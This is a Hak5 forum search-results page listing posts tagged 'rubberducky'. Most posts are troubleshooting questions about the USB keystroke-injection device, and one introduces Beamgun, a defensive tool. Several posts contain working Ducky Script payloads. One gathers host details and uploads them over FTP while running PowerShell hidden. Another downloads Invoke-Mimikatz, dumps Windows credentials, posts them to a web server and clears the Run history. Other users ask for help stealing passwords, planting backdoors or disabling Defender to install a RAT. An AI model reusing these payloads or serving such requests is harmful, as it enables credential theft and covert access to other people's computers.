Search the Community

Showing results for tags 'rubberducky'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 31 results

  1. Hi, I'm trying to use a ducky to automate some stuff on a macbook :-) But it has this funky Azerty layout (see image). I encoded it with "-l resources/be.properties" and that worked fine, except for one character: the at-sign "@", this renders as "ë". So I was thinking, maybe I should create a properties-file for this keyboard layout. But how do I do this? Any thoughts?
  2. So I got a rubber ducky 4 days ago and I been looking at all the YouTube videos but none them explain it well they all go straight to coding instead telling me what to download and what tools I need. I want to be able to steal passwords etc the computer login pass I saw that on YouTube. The is one when you can do a RAT? To control someone screen or view ther file. The also one where it saves passwords and emails it to yourself. Just want to be able to complete something that actually works not the 'hello world'. Like this script (what does it do and how can I make it work) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell I really want to try this one too https://www.hak5.org/blog/15-second-password-hack-mr-robot-style So yeah just need help with it like step by step what I need to install or setup!
  3. Sometimes I have issues with Q LEFT/QUACK LEFTARROW when running scripts. Even by increasing the DELAYs I'll sometimes find the script hitting ENTER on 'no'. It's not the worst problem in the world, as I just press the left arrow myself, but it's more ideal for the script to do the whole job. Anyone else have this issue and know a solution?
  4. I'm having trouble writing a powershell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script into that I wrote: I pretty sure that's correct, and it should exit after deleting a file called ip.txt However, no such luck. What I have tried to solve the problem: STRING EXIT STRING Exit STRING exit; STRING del ip.txt; exit; But, no of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the powershell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so, if the HID type it, it will not exit. Guys, do you have any suggestions? Thanks
  5. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER
  6. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER
  7. Hey guys! I'm debating over weather to get the USB Rubber Ducky or the Bash Bunny. My objective is to be able to create a permanent back door to windows computers. As another note, can the Bash Bunny function as well as a Rubber Duck (using duckyscript as well) other than the 7 sec startup? Thanks in advance!
  8. I've been trying to encode my USB Rubber Ducky on my Mac Desktop, and I can't figure out how! Please help, I can't wait to use it! Also, there was another USB that came in the package with the Rubber Ducky, what is this for? Thanks, Luke
  9. Hi everybody One of the largest and well known Enterprise Security Conferences in Germany is C-Forge, run by Virtual Forge, a large Security Software Company. C-FORGE, May 30 + 31st 2017 , Heidelberg, Germany It is all centered around the (in)famous SAP ERP Software, used by almost all medium and large companies in the world. Since I am a professional pen tester for large SAP systems, I was asked to held a presentation. Everybody liked the proposal of a one-hour presentation of my Hak5-Backpack, with RubberDucky, LANTurtle, BashBunny, of course Pineapple TETRA and a great german product called miniChameleon, which copies and mimics RFID and NFC Cards (like hotel keys and corporate badges) . This will be a rundown about a SAP PenTest playbook scenario (with live elements) to get passwords and hashes with these devices. My experience is, that HW-attacks are often overlooked in Enterprises, but are much more risky, dangerous and overall much more likely than any network hack. So if you happened to be in the area, stop by. It is of no cost, if you are working for a SAP-customer. Check my presentation link and more conference information: C-Forge Presentation "Cracking the SAP Perimeter"
  10. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  11. Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?
  12. I just got the usb rubber ducky in the mail and trying to flash twinduck, but cant get the usb rubber ducky in dfu mode ive tried everything, holding it before putting it in the laptop nothing is working, and seems like this forum is the only place to get support for this, unless someone knows how to get ahold of the people who makes it
  13. Im kind interested is it possible to use USB rubber ducky on IOT devices like router, modem , servers ?
  14. Hello guys!! I really need some help. I have no idea about hacking. I purchase a rubber ducky as I saw that it is possible to enable developer options on an Android phone. I have an S5 that by an accident got the screen cracked and it works fine...but I dont see a single pixel on the screen...I can receive texts (I can her them). I need to recover my files, photos, etc. I craving for help. I need guide how to do that (enable developer options) as I found a software to recover the info but it needs the Developer Option enabled. I appreciate any help on this.
  15. So I was testing out the 15 second rubber ducky attack and i'm not to sure how I should be doing the webserver nor what i'm doing wrong. I am very new to hacking and specially webservers, so please don't be too rough on me. So what I have done so far is just dump everything into the apache server, as I expected I didn't get the output file. Just let me know how stupid I am and where I went wrong. This is the webserver right now: http://imgur.com/5NKP0es http://imgur.com/miCNdsr http://imgur.com/Sa1Ish6 http://imgur.com/VWJqkJZ
  16. HI, I try to put my helloworld.txt into an inject.bin file and if i put in java -jar duckencode.jar -i helloworld.txt it says error: unable to access jarfile duckencode.jar Sorry for my bad english :)
  17. Hi guys.. Idk if this is happening beacuse I'm using windows 10, but I can't get any report from the ducky. I tried ftp, email and usb report methods from ducktollkit. . None of them worked. Also tried the simple-ducky script to create a payload and send the files back via ftp(the ftp and apache server were started automatically by the script). Please help me out! :)
  18. Recently got my usb rubber ducky in the mail and it's been working great so far, except it doesn't seem to want to enter DFU mode. Unlike other people on the forum, the replay button works just fine, I've tested it multiple times. I've followed every tutorial I could find and none seem to work, I've tried it in every usb port on my machine, with and without the microsd, but even though i start holding the button down well before i plug it in, and keep it held for a while after, the ducky executes the current payload as though i wasn't, and doesn't show up in the device manager at all (win10 64x). I'm loving it so far with the base firmware but i feel like I'm missing out on a big part of the fun if i can't flash it, any help or ideas would be greatly appreciated.
  19. is it possible to use the rubber ducky to turn of Windows Defender inject a rat and install it and that all in once could someone help me i am new with this (if you can could you write a script for me that is able to do this) Thanks for the help i really appreciate it Kind regards Scott
  20. I haven't tested it yet, but it seems impractical to me: https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://github.com/JLospinoso/beamgun
  21. Are there any cases or bags sold that can hold various Hak5 equipment like the pineapple, yagi, their cables and antennas and future equipment? Thanks
  22. Hey all, I made a first pass at a rogue-USB-device defense called Beamgun. It's a tiny Windows-only service that listens for keyboards, network adapters, and usb storage devices and takes some user defined action (like locking the workstation or disabling the network adapter). Code's here: https://github.com/JLospinoso/beamgun Two blog posts on how it works (but it's pretty self explanatory): https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://jlospinoso.github.io/infosec/usb rubber ducky/lan turtle/c%23/clr/wpf/.net/security/2016/11/30/beamgun-update-poison-tap.html Y'all are an incredibly innovative group and I'd love if you absolutely attack the crap out of it. Game on!! Josh
  23. So i was looking at getting a rubber ducky but i decided to test an arduino first. But i have one major problem, since im in Norway whenever the arduino runs the script it types different symbols than what i put into the script. I know this is because the arduino types using us layout. Would the rubber ducky have the same issue for me? Or could i change this or something? Any way i can fix the arduino to type in nordic layout? Thanks :)
  24. Recently got my usb rubber ducky in the mail and it's been working great so far, except it doesn't seem to want to enter DFU mode. Unlike other people on the forum, the replay button works just fine, I've tested it multiple times. I've followed every tutorial I could find and none seem to work, I've tried it in every usb port on my machine, with and without the microsd, but even though i start holding the button down well before i plug it in, and keep it held for a while after, the ducky executes the current payload as though i wasn't, and doesn't show up in the device manager at all (win10 64x). I'm loving it so far with the base firmware but i feel like I'm missing out on a big part of the fun if i can't flash it, any help or ideas would be greatly appreciated.
  25. Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.